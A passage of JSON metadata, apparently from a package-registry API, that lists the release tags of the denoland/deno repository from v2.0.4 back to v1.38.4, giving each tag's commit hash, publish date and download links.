eno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos